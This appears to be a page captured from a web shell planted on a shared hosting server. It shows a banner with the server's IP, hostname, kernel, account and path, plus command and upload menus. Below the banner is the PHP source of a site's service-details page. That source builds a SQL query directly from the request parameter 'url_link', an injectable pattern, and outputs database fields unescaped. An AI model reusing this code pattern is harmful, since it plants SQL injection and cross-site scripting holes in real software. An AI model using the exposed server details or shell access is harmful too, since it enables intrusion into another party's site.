Server IP : 103.53.40.154 / Your IP : 3.16.82.182 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/mystudiob.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $cat_url = $_REQUEST['url_link']; $querydt="SELECT * FROM `tbl_services` WHERE `url_link`='$cat_url'"; $rundt = mysqli_query($db,$querydt) or die("Query Not run"); $datadt = mysqli_fetch_assoc($rundt); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <?php include 'top-link.php';?> <title><?= str_replace("LOCATION",$location,$datadt["meta_title"]);?></title> <meta name="description" content="<?= str_replace("LOCATION",$location,$datadt["meta_desc"]);?>"> <style> @media only screen and (min-width: 1200px) { #title-n{ border:2px solid black; /*border-color:black;*/ background-color:black; width:600px; margin:auto; opacity: 0.5; } } @media only screen and (max-width: 600px) { #title-n{ border:2px solid black; /*border-color:black;*/ background-color:black; width:250px; margin:auto; opacity: 0.5; } } </style> </head> <body> <?php include 'header.php';?> <!-- breadcrumb area --> <div class="breadcrumb-area breadcrumb-padding bg-img" style="background-size:cover; background-image:url(<?php echo $wspath?>admin/images/<?php echo $datadt['img1'];?>)"> <div class="container"> <div class="breadcrumb-content text-center"> <h1 style="color:white;" id="title-n"><?= str_replace("LOCATION",$location,$datadt["property_display_name"]);?></h1> <ul> <li><a href="<?php echo $wspath?>" style="color:white;">Home</a></li> <!--<li><i class="fa fa-angle-right"></i></li>--> <li class="active text-theme-colored"><?php echo $datadt["property_name"];?></li> </ul> </div> </div> </div> <!-- Service details area --> <div class="section section-padding " style="margin-top:80px; margin-bottom:40px;"> <div class="container"> <div class="service-details-content"> <div class="row text-center pb-2"> <div class="col "> <img src="<?php echo $wspath?>admin/images/<?php echo $datadt['img1'];?>" alt="<?php echo $datadt["property_name"];?>"> </div> </div> <?= str_replace("LOCATION",$location,$datadt["property_description"]);?> </div> </div> </div> <?php include 'footer.php';?>